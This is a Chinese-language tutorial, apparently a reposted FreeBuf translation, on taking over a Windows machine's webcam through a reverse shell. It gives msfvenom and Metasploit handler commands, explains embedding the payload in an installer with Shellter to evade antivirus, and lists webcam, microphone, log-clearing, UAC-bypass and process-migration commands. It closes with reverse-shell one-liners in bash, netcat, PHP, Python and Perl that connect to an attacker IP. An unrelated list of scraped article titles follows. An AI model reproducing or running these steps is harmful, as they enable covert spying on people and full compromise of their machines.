原标题:使用反向Shell控制摄像头

如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或NSA可以远程监视你。那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢?

这可能是因为你将你的CCTV,IP摄像头公开暴露在了互联网上,而攻击者又在Shodan等网站上发现了它们。加之你又没有更改它们的默认密码和bam,导致攻击者顺利控制了你的摄像头,并对你的一举一动进行监视。

以上是物联网摄像头最常见的安全问题。但如果是内置的网络摄像头,那么更可能的解释是攻击者通过Meterpreter payload入侵并控制了它。使用Meterpreter攻击者可以获取到一个反向shell,这也是本文将要讨论的内容。有关Meterpreter的更多信息,请参阅:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

这里,你可能有个疑问。为什么攻击者不直接访问你的机器,而是通过一个反向shell呢?其实原因很简单,因为直接访问的方式很可能会被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我们主动进行连接,那么目标机器更有可能放行该流量。这是因为目标机器想要与我们的机器建立连接。

msfvenom是一个框架,我们将用它来获取一个反向shell。它已被预装在了Parrot和Kali上。首先,让我们运行以下命令来创建Meterpreter reverse TCP shell payload。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

创建完成后,现在让我们来上传它……….blocked。这是因为MeterPreter payload名声在外,早已被各个安全软件所标记,因此大多数的安全软件都能够发现阻止/隔离它。

我们可以尝试使用一个名为Shellter的工具,来更改其哈希并将反向shell嵌入到另一个文件当中。之所以选择将shell嵌入到一个安装文件中,是因为大多数安装文件需要以管理员身份运行。正如你在之后将看到的那样,以管理员身份运行漏洞利用程序,可以为我们省去很多的麻烦。

你可以通过shelter来直接启动它。同样,它已被预装在了Parrot和Kali上。

让我们使用Auto [A]并定位我为本例创建的可执行文件。

接下来,我们选择反向TCP shell并输入我们机器的IP和端口(攻击者)。完成后,它会将shell嵌入到你选择的exe文件中,以便你将其上传到目标机器。现在你需要通过一种方法将它放到目标机器上,但对于本例我将复制并粘贴。

虽然,我们隐藏了Meterpreter shell,但AV还是成功地检测到了它。为了便于我们的演示,我们现在暂时先将AV关闭。当然,在现实场景中攻击者不可能像我这么随意,更多的是通过技术手段击溃AV,或是创建一个目标无法检测的payload。

然而,尽管屏蔽了Meterpreter外壳,AV仍设法检测到它。 我现在就打算把它关掉,因为我可以。 在现实世界中,攻击者会将AV瘫痪或使其盲目,以便他们可以降低有效载荷。

现在,让我们运行它。

在开始之前,让我们在攻击机机上加载msfconsole(Metasploit)并运行以下命令:

msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.X.X set LPORT 4444 run

你的会话将侦听反向shell脚本中指定的端口和IP。现在,我们以用户身份运行exploit:

正如你在右侧所看到的,我们有几次会话建立失败的情况。这就是我之前提到的为什么需要用户以管理员身份运行的原因。那样就可以顺利运行和注入所有的脚本和DLL。如果用户以管理员身份运行,你将不会看到任何失败的情况。如下所示:

成功获取反向shell后,现在我们就可以针对目标机器执行我们想要的操作了。如果你的目标是摄像头,那么你可以执行以下操作:

Show Webcams: webcam_list Webcam Snap Help: webcam_snap -h Take a Picture and don’t load the image after: webcam_snap -i 1 -v false Record audio: record_mic Record Webcam: run webcam -p /var/www/ Stop recording: run webcam -s

不仅仅是网络摄像头(Webcams)。你还可以执行更多其他的命令。例如:清除所有日志(应用程序,系统和安全日志):clearev

这只是一个例子,黑客也不太可能会运行它。因为这么做反而会打草惊蛇提醒了管理员。如果一台机器你发现所有日志都被清除了,那么你可以初步断定有人已经使用过它了。相反,攻击者更有可能的是删除选择的事件来掩盖他们的痕迹。

所有这些都需要管理员权限,而你的用户可能无法使用提升的权限来运行它。那么,你可以使用像bypassuac_comhijacker这样的命令。首先,你仍需要得到一个普通用户级别的反向shell。

获得shell后,输入background并按Enter键。这会将当前会话移至后台。然后你就可以针对当前会话使用bypassuac_comhijack漏洞利用程序了,如下:

然后,你可以回到原始会话并运行以下命令:

成功运行后,你将获取到一个admin shell。为了与目标机器建立长期稳定的后门连接,我们需要将我们的反向shell隐藏在一个更为隐蔽和稳定的进程中(而不是Putty exe或installer文件中)因为这些应用一旦被关闭,我们的连接就将丢失。这就是为什么我们需要尽快迁移我们的反向shell,到那些可以持续运行进程中的原因。

首先,让我们查看正在运行的进程有哪些。

找到相对稳定的进程后,运行migrate [PID]

然后,它会将你的Meterpreter会话迁移到另一个进程中。这样即使他们关闭了被利用的应用程序,你的会话也将被保留。

正如你所看到的,Meterpreter非常的强大。但这并不是你获得反向shell的唯一方法。你还可以使用Netcat。相比起Meterpreter,某些AV供应商并不将其视为威胁。你可以点击此处,查看virustotal中的检测结果。

你可以在Parrot或Kali上的usr/share/windows-binaries/nc.exe下找到Netcat。将nc.exe上传到目标机器后,我们可以运行nc.exe [Attacker IP] [Port] -e cmd.exe。

在攻击者机器上我们需要侦听连接,这可以通过运行nc -lvp [Chosen port]命令来完成。

你将获取到一个普通用户权限的简单反向shell,这对你来说是一个好的开始。然后,你可以通过它来进一步的利用系统获得管理员权限。以下是一些运行反向shell的示例:

PHP

php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i &3 2>&3”);’

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux

nc 192.168.0.10 1234 -e /bin/sh

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno,0); os.dup2(s.fileno,1); os.dup2(s.fileno,2);p=subprocess.call([“/bin/sh”,”-i”]);’

Perl

perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,

*参考来源:ctrlaltdel,FB小编secist编译,转载请注明来自FreeBuf.COM返回搜狐,查看更多

责任编辑:

python控制摄像头拍照是反的_使用反向Shell控制摄像头相关推荐

  1. vue实现PC端调用摄像头拍照人脸录入、移动端调用手机前置摄像头人脸录入、及图片旋转矫正、压缩上传base64格式/文件格式

    PC端调用摄像头拍照上传base64格式到后台,这个没什么花里胡哨的骚操作,直接看代码 (canvas + video) <template><div><!--开启摄像头 ...

  2. python 摄像头拍照是反的,Python/OpenCV网络摄像头向后移动

    我不知道是什么问题,但当我在网络摄像头上移动时,它捕捉到了我的脸,但它不是我动作的镜子,而是向后/反向的.在 有人知道怎么解决这个问题吗?在 def网络摄像头(网络摄像头.分类器.低比例):if we ...

  3. python运行不了、显示警告_如何消除Shell运行时显示的警告MatplotlibDeprecationWarning?...

    为了方便大家观察只截取了关键部分的代码块. 程序运行时没有错误,只是每次脚本运行到这个函数的时候 from bisect import bisect_right import networkx as ...

  4. 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...

    一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...

  5. java 调用手机相册_微信公众号调用手机摄像头拍照和本地相册

    [实例简介] 微信公众号调用手机摄像头拍照和本地相册,上传服务器 [实例截图] [核心代码] 微信公众号调用手机摄像头拍照和本地相册(2) └── 微信公众号调用手机摄像头拍照和本地相册 └── 微信 ...

  6. python实现摄像头拍照_使用Python控制摄像头拍照并发邮件

    o1 前言 为什么会有写这个程序的想法呢? 最初的想法是写一个可以用电脑前置摄像头拍照的程序,在舍友使用你电脑的时候,不经意间获取到一大堆奇葩舍友的表情包. 然后我又突发奇想,要不搞个开机启动吧,这样 ...

  7. python摄像头拍照比对_如何使用Python控制摄像头拍照并发邮件?

    这个实现起来非常容易,主要分为2步,首先控制摄像头拍照,然后将拍到的照片作为邮件附件发送就行,下面我简单介绍一下实现过程,实验环境win7+python3.6+pycharm5.0,主要内容如下: 控 ...

  8. python控制网络摄像头_用Python控制摄像头拍照并发邮件

    码农那点事儿 关注我们,一起学习进步 00 概述 前言 工具 思路 安装及导入包 设置参数 实现拍照 构造邮件内容 发送邮件 判断网络连接 开机自启 后记 o1 前言 为什么会有写这个程序的想法呢? ...

  9. python控制摄像头拍照_用Python控制摄像头拍照并发邮件

    1 前言 为什么会有写这个程序的想法呢? 最初的想法是写一个可以用电脑前置摄像头拍照的程序,在舍友使用你电脑的时候,不经意间获取到一大堆奇葩舍友的表情包. 然后我又突发奇想,要不搞个开机启动吧,这样我 ...

最新文章

  1. iOS - MySQL 的安装配置
  2. 今天诞生了智能车竞赛华南赛区三项最好成绩
  3. BZOJ3709: [PA2014]Bohater
  4. 利用 CMake 和 NDK 交叉编译 Android 下的可执行程序
  5. Python爬虫介绍及实战入门
  6. emqx—mqtt消息服务器
  7. 给网游写一个挂吧(三) – 启动外挂下
  8. iOS 开发周报:Apple 发布 iPhone 7 / 7 Plus 、Apple Watch 2 等新品
  9. 单片机c语言参考文献最新,[2018年最新整理]10个单片机C语言实例.doc
  10. [html] 你写一个页面需要多长时间?
  11. sqlserver 指定的网络名不再可用_50个比较实用的SQL Server查询语句(1)
  12. 微信小程序 Image 图片实现宽度100%,高度自适应
  13. python网络爬虫--BeautifulSoup
  14. linux shell 多线程执行程序
  15. javascript div 没id_javascript原生自定义轮播图组件
  16. For ourselves
  17. 线程安全单例模式(C++)
  18. [转]应该被记住的天才,写在图灵诞辰100周年
  19. Seven languages in seven weeks (notes on Scala)
  20. 润物无声因挚爱,育人无痕待花开

热门文章

  1. 科大讯飞语音技术学习
  2. crc16 ibm c语言,CRC16常见几个标准的算法及C语言实现
  3. 【嵌入式实战】STM32+Lwip 实现 SNTP 网络授时(超详细)
  4. 树莓派——串口调试助手
  5. EDK II编译过程
  6. 树莓派(raspberry)安装无线网卡讯捷FW150US驱动
  7. Java学习---第二周周报
  8. 2018福建省c语言二级成绩查询,全国计算机二级成绩查询
  9. win7 开始 计算机箭头,win7系统开机黑屏屏幕上一个箭头的解决办法
  10. SOME/IP01-面向服务架构及其通信方式